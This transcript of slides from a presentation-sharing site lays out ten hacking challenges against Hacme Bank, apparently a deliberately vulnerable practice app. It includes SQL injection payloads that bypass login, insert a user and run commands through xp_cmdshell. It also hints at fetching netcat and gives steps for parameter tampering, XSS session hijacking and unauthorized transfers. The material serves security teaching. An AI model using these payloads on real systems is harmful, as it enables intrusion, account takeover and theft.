1 / 13

Hacme Bank

Hacme Bank. Hacme Bank Challenges There are 10 challenges which all have to be completed Complete each challenge 1 by 1 We will talk about the solutions after each challenge has been completed Visit the following link: xxxxxxxxx. Hacme Bank Challenges - 1 Type: SQL Injection

diza
Download Presentation

Hacme Bank

An Image/Link below is provided (as is) to download presentation Download Policy: Content on the Website is provided to you AS IS for your information and personal use and may not be sold / licensed / shared on other websites without getting consent from its author. Content is provided to you AS IS for your information and personal use only. Download presentation by click this link. While downloading, if for some reason you are not able to download a presentation, the publisher may have deleted the file from their server. During download, if you can't get a presentation, the file might be deleted by the publisher.

E N D

Presentation Transcript

  1. Hacme Bank

  2. Hacme Bank Challenges • There are 10 challenges which all have to be completed • Complete each challenge 1 by 1 • We will talk about the solutions after each challenge has been completed • Visit the following link: xxxxxxxxx

  3. Hacme Bank Challenges - 1 • Type: SQL Injection • Result: Bypass the login

  4. Hacme Bank Challenges - 2 • Type: SQL Injection • Result: Database table modification • Steps • ’ having 1=1-- • ’ union select (tables) from fsb_users having 1=1— • '; INSERT INTO FSB_USERS VALUES(123423, 'HAX0R12', 'HACKME12', 'EASY32', GETDATE())--

  5. Hacme Bank Challenges - 3 • Type: SQL Injection & Poor configuration management • Result: Command execution • Steps • ’;EXEC master.dbo.xp_cmdshell ’command’;-- • This can REALLY help an attacker. Here is some help: • The webserver is also a TFTP server and netcat is accessible for download and may be used for this exercise • The path to the file is c:\tftp32d\nc.exe

  6. Hacme Bank Challenges - 4 • Type: Parameter Tampering • Result: Privilege escalation • Steps • My accounts • Alter the Account type from the silver account to the platinum

  7. Hacme Bank Challenges - 5 • Type: Parameter Tampering • Result: Unauthorised Access • Tools Required: • Firefox with the ”Tamper Data” plugin or • IE with Burp Proxy • Steps • Request a loan • Try and alter the interest rate to a better value 

  8. Hacme Bank Challenges - 6 • Type: Cross Site Scripting • Result: Account Hijacking • Steps: • Post Message • Create a message and try to execute some scripts. You can use the _session.asp • Post your message

  9. Hacme Bank Challenges - 7 • Type: Parameter Tampering • Result: Money !! • Steps: • Transfer funds • Transfer money to your account from someone else’s account

  10. Hacme Bank Challenges - 8 • Type: Parameter Tampering (Cookie poisening) • Result: Brute Force attacks are enabled • Tools Required: • Firefox with the ”Tamper Data” plugin or • IE with Burp Proxy • Steps: • Log out and find the log • Figure out how this web application stops brute force attacks and removed it

  11. Hacme Bank Challenges - 9 • Type: Parameter Tampering (Cookie poisening) • Result: Brute Force attacks are enabled • Tools Required: • Firefox with the ”Tamper Data” plugin or • IE with Burp Proxy • Steps: • Log out and find the log • Figure out how this web application stops brute force attacks and removed it

  12. Hacme Bank Challenges - 10 • Type: Parameter Tampering (Cookie poisening) • Result: Brute Force attacks are enabled • Tools Required: • Firefox with the ”Tamper Data” plugin or • IE with Burp Proxy • Steps: • Login • Alter the unique information that is associated with account numbers to view other accounts

  13. ?

More Related